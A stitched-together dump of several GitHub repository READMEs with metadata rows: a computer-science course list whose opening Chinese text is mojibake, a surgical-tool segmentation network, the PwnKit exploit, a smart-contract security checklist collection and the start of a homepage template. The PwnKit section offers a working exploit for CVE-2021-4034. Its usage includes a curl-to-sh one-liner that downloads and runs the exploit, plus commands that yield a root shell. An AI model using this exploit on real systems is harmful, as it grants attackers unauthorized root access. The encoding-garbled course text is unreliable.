ๅฐๆนพๅคงๅญฆๆž—่ฝฉ็”ฐๆ•™ๆŽˆ [ใ€Šๆœบๅ™จๅญฆไน ๅŸบ็ŸณไธŠใ€‹](https://www.coursera.org/learn/ntumlone-mathematicalfoundations)๏ผŒ [ใ€Šๆœบๅ™จๅญฆไน ๅŸบ็Ÿณไธ‹ใ€‹](https://www.coursera.org/learn/ntumlone-algorithmicfoundations) - ๅฐๆนพๅคงๅญฆ[ใ€ŠApplied Deep Learning/Machine Learning and Having It Deep and Structuredใ€‹](https://www.csie.ntu.edu.tw/~yvchen/f106-adl/syllabus.html) - [UCB CS188](https://www.bilibili.com/video/av15630620/) - [MIT 6.034](http://open.163.com/movie/2017/9/Q/S/MCTMNN3UI_MCTMNR8QS.html) - ๆ–ฏๅฆ็ฆ CS229 [่ง†้ข‘](http://open.163.com/special/opencourse/machinelearning.html) [่ฎฒไน‰](https://github.com/Kivy-CN/Stanford-CS-229-CN) - ๆ–ฏๅฆ็ฆ CS231n [่ง†้ข‘](https://www.bilibili.com/video/av17204303/) [่ฎฒไน‰](https://zhuanlan.zhihu.com/p/21930884?refer=intelligentunit) - ๆ–ฏๅฆ็ฆ CS224d [ไธป้กต](http://cs224d.stanford.edu/) [่ฎฒไน‰](http://blog.csdn.net/column/details/dl-nlp.html) - [ๆ–ฏๅฆ็ฆ CS20si](https://web.stanford.edu/class/cs20si/) - ๆ–ฏๅฆ็ฆ CS230 / DeepLearningAI 
- [MIT 6.S191](https://www.bilibili.com/video/av19113488)
- UCB CS294: [videos](https://www.bilibili.com/video/av9802698/), [notes](https://zhuanlan.zhihu.com/c_150977189)

## Operating Systems

- [MIT's famous 6.828](<https://pdos.csail.mit.edu/6.828/2018/schedule.html>)
- [Tsinghua University's OS course ucore; videos on both XuetangX and Bilibili](<http://os.cs.tsinghua.edu.cn/oscourse/OS2017spring#A.2Bi.2F56C4nGmJE->)
- [rCore, the Rust version of ucore](https://rcore-os.github.io/rCore_tutorial_doc/)
- [Nanjing University ICS PA](https://nju-projectn.github.io/ics-pa-gitbook/ics2019/)
- NJU ICS PA: [Bilibili link](https://www.bilibili.com/video/BV1qa4y1j7xk)
- [NJU OS](https://www.bilibili.com/video/BV1HN41197Ko?p=1)
- Shanghai Jiao Tong University, Operating Systems (Chen Haibo, Xia Yubin): [Bilibili link](https://www.bilibili.com/video/BV1B341117Ez?from=search&seid=711317104834272627&spm_id_from=333.337.0.0)
- [Shanghai Jiao Tong University SE315](https://ipads.se.sjtu.edu.cn/courses/os/): [video course (CNMOOC)](https://www.cnmooc.org/portal/course/5610/14956.mooc), [textbook *Modern Operating Systems: Principles and Implementation*](https://ipads.se.sjtu.edu.cn/mospi/), [companion lab](https://gitee.com/ipads-lab/chcore-lab)
- [CMU 15-213, the course behind CSAPP](https://www.cs.cmu.edu/~213/schedule.html)
- [CMU 15410/605](https://www.cs.cmu.edu/~410/)
- [Gate Lectures: OS](https://www.youtube.com/playlist?list=PLEbnTDJUr_If_BnzJkkN_J0Tl3iXTL8vq)

## Programming Languages

- [Structure and Interpretation of Computer Programs](https://book.douban.com/subject/1451622/)
- [CIS 194 (for learning Haskell)](<https://www.seas.upenn.edu/~cis194/spring13/lectures.html>)
- [Berkeley's Python adaptation of SICP](<https://cs61a.org/>)
- [University of Washington, Programming Languages](<https://www.coursera.org/lecture/programming-languages/welcome-and-some-course-mechanics-3dedE>)
- [A condensed MIT 6.001 (SICP)](http://web.mit.edu/alexmv/6.037/)

## Compilers

- [Stanford CS143](http://web.stanford.edu/class/cs143/)
- [Stanford CS243](https://suif.stanford.edu/~courses/cs243/)
- [Stanford CS343](http://web.stanford.edu/class/cs343/)
- [Gate Lectures: Compilers](https://www.youtube.com/playlist?list=PLEbnTDJUr_IcPtUXFy2b1sGRPsLFMghhS)

## Database Systems

- [CMU 15445](https://15445.courses.cs.cmu.edu/fall2019/#)
- [CMU 15721](https://15721.courses.cs.cmu.edu/spring2019/)
- [MIT 6.830/6.814](<http://db.lcs.mit.edu/6.830/sched.php>)
- [pingcap talent-plan](https://zhuanlan.zhihu.com/p/61340679)
  - [instruction](https://docs.google.com/document/d/1UG0OHuL6l_hHWs3oyT9gA2n7LuYUfV23nmz0tRvXq2k/edit#heading=h.ywlair765ic9)
- [CS 245](http://web.stanford.edu/class/cs245/#schedule)
- [Stanford CS346](https://web.stanford.edu/class/cs346/2015/)
- [Berkeley CS 186](https://cs186berkeley.net/)
- [Stanford CS145](https://www.bilibili.com/video/av19616961/)
- [University of Washington CSE444](https://courses.cs.washington.edu/courses/cse444/15sp/)

## Distributed Systems

- **Data Structures** by Deng Junhui (Tsinghua): [MOOC](https://link.zhihu.com/?target=http%3A//www.xuetangx.com/courses/course-v1%3ATsinghuaX%2B30240184%2Bsp/about)
- [MIT 6.824](https://pdos.csail.mit.edu/6.824/)
- [Stanford CS244b: Distributed systems](https://www.scs.stanford.edu/14au-cs244b/)
- [CMU 15-440/640, Spring 2016: Distributed Systems](https://www.cs.cmu.edu/~15-440/)

## Data Structures and Algorithms

- [UCB CS61b](https://inst.eecs.berkeley.edu/~cs61b/)
- [Princeton Algs4](http://algs4.cs.princeton.edu/)
- [MIT 6.006](http://open.163.com/special/opencourse/algorithms.html)
- [MIT 6.006](http://open.163.com/special/opencourse/algorithms.html)
- [Gate Lectures: Algorithms and Data Structures](https://www.youtube.com/playlist?list=PLEbnTDJUr_IeHYw_sfBOJ6gk5pie0yP-0)
- [*Algorithms, 4th Edition*](https://algs4.cs.princeton.edu/home/) - Princeton has also published two companion courses on [Coursera](https://www.coursera.org/): [Algorithms, Part I](https://www.coursera.org/learn/algorithms-part1) and [Algorithms, Part II](https://www.coursera.org/learn/algorithms-part2)
- [Stanford CS106b](http://open.163.com/special/opencourse/abstractions.html) (broken link)

## Computer Networks

- **Computer Science**, Harvard: [Bilibili](https://link.zhihu.com/?target=https%3A//www.bilibili.com/video/av310513%3Ffrom%3Dsearch%26seid%3D4682685095165261117)
- [CMU-15441](https://computer-networks.github.io/sp19/)
- [cs144](https://cs144.github.io/)
- [Top-Down Approach](http://uniteng.com/wiki/doku.php?id=classlog:computer_networks) - [myk's top-down notes](https://github.com/moranzcw/Computer-Networking-A-Top-Down-Approach-NOTES)
- [Berkeley EE122](https://www2.eecs.berkeley.edu/Courses/EE122/)
- [Gate Lectures: Computer Networks](https://www.youtube.com/playlist?list=PLEbnTDJUr_IegfoqO4iPnPYQui46QqT0j)
- [Stanford CS144](https://www.bilibili.com/video/av11930774/)
- MIT Computer and Network Security: [Bilibili link](https://www.bilibili.com/video/BV1Bm4y1o7cx?spm_id_from=333.1007.top_right_bar_window_history.content.click)

## Computer Systems Design

- [nand2tetris](http://www.nand2tetris.org/)
- CMU 15-213: [videos](https://www.bilibili.com/video/BV1iW411d7hd), [notes](https://hansimov.gitbook.io/csapp/)
- MIT 6.828: [official homepage](https://pdos.csail.mit.edu/6.828/), [xv6 documentation (Chinese)](https://th0ar.gitbooks.io/xv6-chinese/content/content/cover.html)
- [UCB CS61c](http://www-inst.eecs.berkeley.edu/~cs61c/)

## Graduate Courses

- **6.254 Game Theory with Engineering Applications** Course page: [Game Theory with Engineering Applications (Spring 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-254-game-theory-with-engineering-applications-spring-2010)
- **6.823 Computer System Architecture** Course page: [Computer System Architecture (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-823-computer-system-architecture-fall-2005)
- **6.824 Distributed Computer Systems Engineering** Course page: [Distributed Computer Systems Engineering (Spring 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-824-distributed-computer-systems-engineering-spring-2006) One of this course's instructors is Robert Morris, creator of the Morris worm, who was once named among the five greatest hackers.
- **6.825 Techniques in Artificial Intelligence** Course page: [Techniques in Artificial Intelligence (SMA 5504) (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-825-techniques-in-artificial-intelligence-sma-5504-fall-2002)
- **6.826 Principles of Computer Systems** Course page: [Principles of Computer Systems (Spring 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-826-principles-of-computer-systems-spring-2002)
- **6.827 Multithreaded Parallelism: Languages and Compilers** Course page:
[Multithreaded Parallelism: Languages and Compilers (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-827-multithreaded-parallelism-languages-and-compilers-fall-2002)
- **6.828: Operating System Engineering** Course pages: [Operating System Engineering (2018)](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.828/2018/schedule.html), [Operating System Engineering (Fall 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-828-operating-system-engineering-fall-2012) Prerequisites: [6.033 Computer System Engineering](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-033-computer-system-engineering-spring-2009), [6.170 Software Studio](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-170-software-studio-spring-2013), [6.004 Computation Structures](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-004-computation-structures-spring-2009). This course studies the fundamental design and implementation of operating systems, including virtual memory, threads, context switching, kernels, interrupts, system calls, interprocess communication, coordination, and the interaction between software and hardware.
- **6.829: Computer Networks** Course pages: [Computer Networks, Fall 2020](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.829/www/currentsemester/), [Computer Networks (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-829-computer-networks-fall-2002)
- **6.830/6.814 Database Systems** ★★★★★ Course pages: [Database Systems (Spring 2021)](https://link.zhihu.com/?target=http%3A//dsg.csail.mit.edu/6.830/index.php), [Database Systems (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-830-database-systems-fall-2010)
- **6.831 User Interface Design and Implementation** Course page: [User Interface Design and Implementation (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-831-user-interface-design-and-implementation-spring-2011)
- **6.838 Algorithms for Computer Animation** Course page: [Algorithms for Computer Animation (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-838-algorithms-for-computer-animation-fall-2002)
- **6.840J Theory of Computation** Course page: [Theory of Computation (Fall 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-404j-theory-of-computation-fall-2006)
- **6.841J Advanced Complexity Theory** Course page: [Advanced Complexity Theory (Spring 2016)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-405j-advanced-complexity-theory-spring-2016)
- **6.844 Computability Theory of and with Scheme** Course page: [Computability Theory of and with Scheme (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-844-computability-theory-of-and-with-scheme-spring-2003)
- **6.851 Advanced Data Structures** Course page: [Advanced Data Structures (Spring 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-851-advanced-data-structures-spring-2012)
- **6.852J Distributed Algorithms** Course page:
[Distributed Algorithms (Fall 2009)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-852j-distributed-algorithms-fall-2009)
- **6.854J Advanced Algorithms** Course pages: [Advanced Algorithms (Fall 2008)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-854j-advanced-algorithms-fall-2008), [Advanced Algorithms (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-854j-advanced-algorithms-fall-2005)
- **6.855J Network Optimization** Course page: [Network Optimization (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/sloan-school-of-management/15-082j-network-optimization-fall-2010)
- **6.856J Randomized Algorithms** Course page: [Randomized Algorithms (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-856j-randomized-algorithms-fall-2002)
- **6.857 Network and Computer Security** Course page: [Network and Computer Security (Spring 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-857-network-and-computer-security-spring-2014)
- **6.858 Computer Systems Security** Course page: [Computer Systems Security (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014)
- **6.859J Integer Programming and Combinatorial Optimization** Course page: [Integer Programming and Combinatorial Optimization (Fall 2009)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/sloan-school-of-management/15-083j-integer-programming-and-combinatorial-optimization-fall-2009)
- **6.863J Natural Language and the Computer Representation of Knowledge** Course page: [Natural Language and the Computer Representation of Knowledge (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-863j-natural-language-and-the-computer-representation-of-knowledge-spring-2003)
- **6.864 Advanced Natural Language Processing** Course page: [Advanced Natural Language Processing (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-864-advanced-natural-language-processing-fall-2005)
- **6.866 Machine Vision** Course page: [Machine Vision (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-801-machine-vision-fall-2020)
- **6.867 Machine Learning** Course page: [Machine Learning (Fall 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-867-machine-learning-fall-2006)
- **6.871 Knowledge-Based Applications Systems** Course page: [Knowledge-Based Applications Systems (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-871-knowledge-based-applications-systems-spring-2005)
- **6.875 Cryptography and Cryptanalysis** Course page: [Cryptography and Cryptanalysis (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-875-cryptography-and-cryptanalysis-spring-2005)
- **6.876J Advanced Topics in Cryptography** Course page: [Advanced Topics in Cryptography (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-876j-advanced-topics-in-cryptography-spring-2003)
- **6.881 Representation and Modeling for Image Analysis**
่ฏพ็จ‹ๅœฐๅ€๏ผš[Representation and Modeling for Image Analysis (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-881-representation-and-modeling-for-image-analysis-spring-2005) - **6.883 ๆ™ฎ้่ฎก็ฎ—ๆŠ€ๆœฏ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Pervasive Human Centric Computing (SMA 5508) (Spring 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-883-pervasive-human-centric-computing-sma-5508-spring-2006) - **6.883 ็จ‹ๅบๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Program Analysis (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-883-program-analysis-fall-2005) - **6.890 ็ฎ—ๆณ•ๅคๆ‚ๅบฆๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Algorithmic Lower Bounds: Fun with Hardness Proofs (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-890-algorithmic-lower-bounds-fun-with-hardness-proofs-fall-2014) - **6.892 ่ฏญ็ฏ‡ๅˆ†ๆž็š„่ฎก็ฎ—ๆœบๆจกๅž‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computational Models of Discourse (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-892-computational-models-of-discourse-spring-2004) - **6.895 ็ผ–็ ่ฆ็ด ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Essential Coding Theory (Fall 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-895-essential-coding-theory-fall-2004) - **6.895 ๅนณ่กŒ็ณป็ปŸ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€ [Theory of Parallel Systems (SMA 5509) (Fall 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-895-theory-of-parallel-systems-sma-5509-fall-2003) - **6.896 ๅนณ่กŒ็กฌไปถ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Theory of Parallel Hardware (SMA 5511) (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-896-theory-of-parallel-hardware-sma-5511-spring-2004) - **6.897ๅฏ†็ ๅญฆ่ฎบๆ–‡้€‰่ฏป** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Selected Topics in Cryptography (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-897-selected-topics-in-cryptography-spring-2004) ## ๅฎž้ชŒ่ฏพ MIT้’ˆๅฏนไธๅŒ็š„็ผ–็จ‹่ฏญ่จ€้ƒฝๆœ‰้…ๅฅ—็š„ๅฎž้ชŒ่ฏพLab๏ผŒๅฆ‚C่ฏญ่จ€ใ€Javaใ€C++็ญ‰ - **6.087 C่ฏญ่จ€ๅฎžๆˆ˜** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Practical Programming in C (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-087-practical-programming-in-c-january-iap-2010) - **6.088 C่ฏญ่จ€ๅ†…ๅญ˜็ฎก็†ไธŽC++้ขๅ‘ๅฏน่ฑก** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to C Memory Management and C++ Object-Oriented Programming (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-088-introduction-to-c-memory-management-and-c-object-oriented-programming-january-iap-2010) - **6.090 ่ฝฏไปถๅผ€ๅ‘็ป้ชŒ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Building Programming Experience: A Lead-In to 6.001 (January IAP 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-090-building-programming-experience-a-lead-in-to-6-001-january-iap-2005) - **6.092 Java็จ‹ๅบๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Programming in Java (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-092-introduction-to-programming-in-java-january-iap-2010) 
ใ€[Java Preparation for 6.170 (January IAP 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-092-java-preparation-for-6-170-january-iap-2006) - **6.096 C++็จ‹ๅบๅผ€ๅ‘** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to C++ (January IAP 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-096-introduction-to-c-january-iap-2011) - **6.370 ไบบๅทฅๆ™บ่ƒฝ็ซž่ต›** ่ฏพ็จ‹ๅœฐๅ€๏ผš[The Battlecode Programming Competition (January IAP 2013)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-370-the-battlecode-programming-competition-january-iap-2013) ## ๅทจไบบ็š„่‚ฉ่†€ https://zhuanlan.zhihu.com/p/112763953 https://www.zhihu.com/question/57532048 https://www.zhihu.com/question/29597104 https://www.zhihu.com/question/20571226/answer/1901441044 https://zhuanlan.zhihu.com/p/39030715
๐Ÿ˜ๅ›ฝๅ†…ๅค–่ฎก็ฎ—ๆœบ็š„ไผ˜็ง€่ฏพ็จ‹๏ผŒๅŒ…ๅซMITใ€CMU็ญ‰ไธ–็•ŒCSๅๆ ก๏ผŒ๐Ÿ”ฅ๐Ÿ”ฅๅ…ถไธญๅŒ…ๅซ่ฎก็ฎ—ๆœบๅŸบ็ก€ๅญฆ็ง‘๏ผˆๆ“ไฝœ็ณป็ปŸใ€่ฎก็ฎ—ๆœบ็ฝ‘็ปœใ€็ผ–่ฏ‘ๅ™จใ€ๆ•ฐๆฎๅบ“ใ€ๆ•ฐๆฎ็ป“ๆž„ไธŽ็ฎ—ๆณ•็ญ‰๏ผ‰ไปฅๅŠไบบๅทฅๆ™บ่ƒฝ&AI็ญ‰้ซ˜็บง็ง‘็›ฎ๏ผŒๆฌข่ฟŽ้€š่ฟ‡PRๅฝขๅผ่ดก็Œฎ๏ผ
null
0
1
0
29
1
1
0
AngeLouCN/Min_Max_Similarity
# Min_Max_Similarity

A contrastive learning based semi-supervised segmentation network for medical image segmentation

This repository contains the implementation of a novel contrastive learning based semi-supervised segmentation network for segmenting surgical tools.

[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/min-max-similarity-a-contrastive-learning/semi-supervised-semantic-segmentation-on-33)](https://paperswithcode.com/sota/semi-supervised-semantic-segmentation-on-33?p=min-max-similarity-a-contrastive-learning) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/min-max-similarity-a-contrastive-learning/semi-supervised-semantic-segmentation-on-2017)](https://paperswithcode.com/sota/semi-supervised-semantic-segmentation-on-2017?p=min-max-similarity-a-contrastive-learning)

<div align=center><img src="https://github.com/AngeLouCN/Min_Max_Similarity/blob/main/img/architecture.jpg" width="1000" height="450" alt="Result"/></div>
<p align="center"><b>Fig. 1. The architecture of Min-Max Similarity.</b></p>

**:fire: NEWS :fire:** **The full paper is available:** [Min-Max Similarity](https://arxiv.org/abs/2203.15177)

**:fire: NEWS :fire:** **The paper has been accepted by IEEE Transactions on Medical Imaging.** Early access is available [here](https://ieeexplore.ieee.org/document/10098633/keywords#keywords).

## Environment

- python==3.6
- packages:

```
conda install pytorch==1.8.0 torchvision==0.9.0 torchaudio==0.8.0 cudatoolkit=11.1 -c pytorch -c conda-forge
```

```
conda install opencv-python pillow numpy matplotlib
```

- Clone this repository

```
git clone https://github.com/AngeLouCN/Min_Max_Similarity
```

## Data Preparation

We use five datasets to test its performance:

- [Kvasir-instrument](https://datasets.simula.no/kvasir-instrument/)
- [EndoVis'17](https://endovissub2017-roboticinstrumentsegmentation.grand-challenge.org/)
- Cochlear Implant
- [RoboTool](https://www.synapse.org/#!Synapse:syn22427422)
- [ART-NET](https://github.com/kamruleee51/ART-Net)

**File structure**

```
|-- data
|   |-- kvasir
|   |   |-- train
|   |   |   |--image
|   |   |   |--mask
|   |   |-- test
|   |   |   |--image
|   |   |   |--mask
|   |-- EndoVis17
|   |   |-- train
|   |   |   |--image
|   |   |   |--mask
|   |   |-- test
|   |   |   |--image
|   |   |   |--mask
......
```

**You can also test on other public medical image segmentation datasets with the above file structure**

## Usage

- **Training:** You can change hyper-parameters such as the labeled ratio and learning rate in ```train_mms.py```, and directly run the code (a minimal, illustrative sketch of a contrastive objective in this spirit appears at the end of this README).
- **Testing:** You can change the dataset name in ```test.py``` and run the code.

## Segmentation Performance

<div align=center><img src="https://github.com/AngeLouCN/Min_Max_Similarity/blob/main/img/seg_result.jpg" width="650" height="550" alt="Result"/></div>
<p align="center"><b>Fig. 2. Visual comparison of our method with state-of-the-art models. Segmentation results are shown for 50% of labeled training data for Kvasir-instrument, EndoVis'17, ART-NET and RoboTool, and 2.4% labeled training data for cochlear implant. From left to right are EndoVis'17, Kvasir-instrument, ART-NET, RoboTool, Cochlear implant and region of interest (ROI) of Cochlear implant.
</b></p>

## Citation

```
@article{lou2023min,
  title={Min-Max Similarity: A Contrastive Semi-Supervised Deep Learning Network for Surgical Tools Segmentation},
  author={Lou, Ange and Tawfik, Kareem and Yao, Xing and Liu, Ziteng and Noble, Jack},
  journal={IEEE Transactions on Medical Imaging},
  year={2023},
  publisher={IEEE}
}
```

## Acknowledgement

Our code is based on [Duo-SegNet](https://github.com/himashi92/Duo-SegNet); we thank the authors for their excellent work and repository.
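## Appendix: An Illustrative Contrastive Loss

The sketch below is *not* the exact objective implemented in ```train_mms.py```; it is a minimal, self-contained PyTorch illustration of the kind of cosine-similarity contrastive objective (InfoNCE-style) that min-max similarity training builds on. The projection dimension, temperature, and pairing scheme are assumptions made for this example only.

```python
import torch
import torch.nn.functional as F

def contrastive_similarity_loss(feat_a, feat_b, temperature=0.1):
    """feat_a, feat_b: (N, D) projected features from two views/branches.
    Row i of feat_a and row i of feat_b form a positive pair; all other
    rows act as negatives whose similarity is pushed down."""
    a = F.normalize(feat_a, dim=1)
    b = F.normalize(feat_b, dim=1)
    logits = a @ b.t() / temperature                  # (N, N) cosine similarities
    targets = torch.arange(a.size(0), device=a.device)
    # Cross-entropy maximizes the diagonal (positive) similarities
    # while minimizing the off-diagonal (negative) ones.
    return F.cross_entropy(logits, targets)

# Toy usage with random features:
loss = contrastive_similarity_loss(torch.randn(8, 128), torch.randn(8, 128))
print(loss.item())
```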
A contrastive learning based semi-supervised segmentation network for medical image segmentation
contrastive-learning,semi-supervised-learning,medical-image-segmentation,surgical-tools-segmentation,medical-video-analysis,video-segmentation
0
1
0
62
4
1
0
ly4k/PwnKit
# PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation ## Usage Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. ```bash sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" ``` ![](./imgs/oneliner.png) ### Manually ```bash curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit # interactive shell ./PwnKit 'id' # single command ``` ![](./imgs/exploit.png) ### Patched Running the exploit against patched versions will yield the following output. ![](./imgs/patched.png) ### Build ```bash gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC ``` ## Technical Details - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 ## References - https://github.com/arthepsy/CVE-2021-4034/
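## Preflight Check

The snippet below is not part of PwnKit; it is a small, hedged helper that only checks the exploit's basic precondition: that a `pkexec` binary exists and is setuid root. It cannot tell you whether the installed polkit build is patched; for that, run the exploit and compare with the *Patched* section above. The fallback path is an assumption and may differ across distributions.

```python
import os
import shutil
import stat

# Locate pkexec; /usr/bin/pkexec is only a common default, not guaranteed.
path = shutil.which("pkexec") or "/usr/bin/pkexec"

try:
    st = os.stat(path)
except FileNotFoundError:
    print("pkexec not found; CVE-2021-4034 does not apply here")
else:
    # The exploit requires pkexec to be setuid and owned by root.
    suid_root = bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0
    print(f"{path}: setuid-root = {suid_root}")
```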
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
cve-2021-4034
0
2
1
10
5
1
0
nascentxyz/simple-security-toolkit
# Simple Security Toolkit This repo is a collection of practical security-focused guides and checklists for smart contract development, assembled by the [Nascent](https://www.nascent.xyz/) team to share with our portfolio companies and others in the ecosystem who might find it useful. It is not intended to be comprehensive; it skews towards practical and opinionated recommendations that we find to be appropriate particularly for teams developing and managing early versions of a protocol. ### Contents 1. **[Development Process](https://github.com/nascentxyz/simple-security-toolkit/blob/main/development-process.md)** One of the most crucial factors in having a secure codebase is a solid development process: "an ounce of prevention is worth a pound of cure." This document gives an example development process that we, at Nascent, have found works well. It walks through the steps from initial design and feature requests -> specification -> evaluation -> implementation -> testing -> deployment -> monitoring. 2. **[Audit Readiness Checklist](https://github.com/nascentxyz/simple-security-toolkit/blob/main/audit-readiness-checklist.md)** Audits are expensive, time consuming, and need to be scheduled months in advance. Completing this checklist helps ensure a codebase is ready for outside review and helps catch as much low-hanging fruit as possible. This will allow the auditors to focus their time and attention on identifying deeper and more critical vulnerabilities. 3. **[Pre-Launch Security Checklist](https://github.com/nascentxyz/simple-security-toolkit/blob/main/pre-launch-security-checklist.md)** Before deploying code to mainnet, teams should complete this checklist to make sure they have taken the necessary steps to enable reporting and responding to potential bugs or security incidents. 4. **[Incident Response Plan Template](https://github.com/nascentxyz/simple-security-toolkit/blob/main/incident-response-plan-template.md)** No project ever expects to have a security incident. Having a plan documented in advance can help a team respond swiftly and calmly in the heat of the moment when adrenaline is running high. ### Contributing Thanks for your interest in contributing! We are *very* opinionated as to what gets added to this repository. However, we are open to outside contributors putting forth suggestions and encourage you to do so. If you have ideas for a new document, it is likely best to open an issue before starting on a PR to gauge our support. If you have suggestions to existing documents, you can open a PR right away. Feel free to fork this repo and make it your own. Share your ideas with your team and iterate. If you find things that may be useful to a broader set of teams, consider opening a PR!
A collection of practical security-focused guides and checklists for smart contract development
crypto,security,security-tools,smart-contracts,solidity
0
13
13
58
0
1
0
RayeRen/acad-homepage.github.io
<h1 align="center"> AcadHomepage </h1>

<div align="center">

